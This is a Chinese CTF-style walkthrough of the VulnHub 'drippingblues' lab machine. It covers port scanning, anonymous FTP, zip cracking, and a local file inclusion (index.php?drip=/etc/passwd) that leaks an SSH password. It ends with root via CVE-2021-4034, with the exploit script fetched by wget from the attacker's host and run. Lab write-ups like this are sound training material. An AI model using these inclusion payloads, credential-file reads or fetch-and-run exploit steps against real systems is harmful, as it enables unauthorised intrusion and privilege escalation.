drippingblues1

admin 2025年3月18日18:29:36评论4 views字数 2128阅读7分5秒阅读模式

下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.139 仅主机 vxbox

参考:https://www.freebuf.com/articles/web/327947.html

主机发现

drippingblues1

端口扫描

nmap -p- -sV 192.168.56.139

drippingblues1

发现21端口开放,尝试匿名登录

annonymous/anonymous

ftp 192.168.56.129

将zip文件下载到本地

get respectmydrip.zip

drippingblues1

解压密码爆破出来

072528035

drippingblues1

但是压缩包里面的另一个压缩包不知道密码

just focus on "drip"

drippingblues1

wen页面

driftingblues is hacked again so it's now called drippingblues. drippingblues1 hahaha          by          travisscott & thugger 

drippingblues1

目录扫描

发现robots.txt

dirsearch -u http://192.168.56.139

drippingblues1

发现http://192.168.56.139/dripisreal.txt

drippingblues1

drippingblues1

这个似乎是诱导,并没有啥用

hello dear hacker wannabe,go for this lyrics:https://www.azlyrics.com/lyrics/youngthug/constantlyhating.htmlcount the n words and put them side by side then md5sum itie, hellohellohellohello >> md5sum hellohellohellohelloit's the password of ssh

drippingblues1

drippingblues1

看起来像是靶机内部的文件,文件包含漏洞优先包含

etc/dripispowerful.html

drippingblues1

根据之前的提示drip,发现此处存在一个本地文件包含漏洞

http://192.168.56.139/index.php?drip=/etc/passwd

发现用户thugger

drippingblues1

drippingblues1

http://192.168.56.139/index.php?drip=/etc/dripispowerful.html

发现密码imdrippinbiatch

drippingblues1

ssh连接

ssh [email protected]

drippingblues1

提权

通过收集靶机的操作系统信息,符合利用条件的提权漏洞有:

Linux DirtyPipe权限提升漏洞 CVE-2022-0847 (需满足Linux内核 5.8 及之后版本)Linux kernel权限提升漏洞 CVE-2021-3493(需满足Ubuntu 20.04 LTS)Linux sudo权限提升漏洞 CVE-2021-3156(需满足Sudo 1.8.2 - 1.8.31p2)Linux Polkit权限提升漏洞 CVE-2021-4034(需满足2009年5月至今发布的所有Polkit 版本)

CVE-2022-0847,称为"Dirty Pipe"漏洞,是2022年发现的一个影响Linux内核的重大安全漏洞。此漏洞允许没有权限的用户覆盖只读文件的内容,包括根用户可以访问的文件,导致本地提权和数据破坏。判断系统是否受到这个漏洞影响,需要检查系统的Linux内核版本。"Dirty Pipe"漏洞影响的是以下的Linux内核版本:5.8及更高的版本(但在5.11.22, 5.10.41, 和 5.4.123版本中已修复)

基本目前除了最新版的Polkit修复了该漏洞,其他版本都可以提权,可利用版本的范围极大。

https://github.com/nikaiw/CVE-2021-4034/blob/master/cve2021-4034.py

polkitd介绍

polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。Polkit 在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和 sudo 等程序不同,Polkit 并没有赋予进程完全的 root 权限,而是通过一个集中的策略系统进行更精细的授权。Polkit 定义出一系列操作,例如运行 GParted, 并将用户按照群组或用户名进行划分,例如 wheel 群组用户。然后定义每个操作是否可以由某些用户执行,执行操作前是否需要一些额外的确认,例如通过输入密码确认用户是不是属于某个群组。https://github.com/Almorabea/Polkit-exploit

ps -ef | grep polkit

drippingblues1

获得权限

wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip

wget http://192.168.56.132/cve2021-4034.py

chmod 777 cve2021-4034.py

python3 cve2021-4034.py

drippingblues1

drippingblues1

原文始发于微信公众号(王之暴龙战神):drippingblues1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日18:29:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   drippingblues1https://cn-sec.com/archives/3855541.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息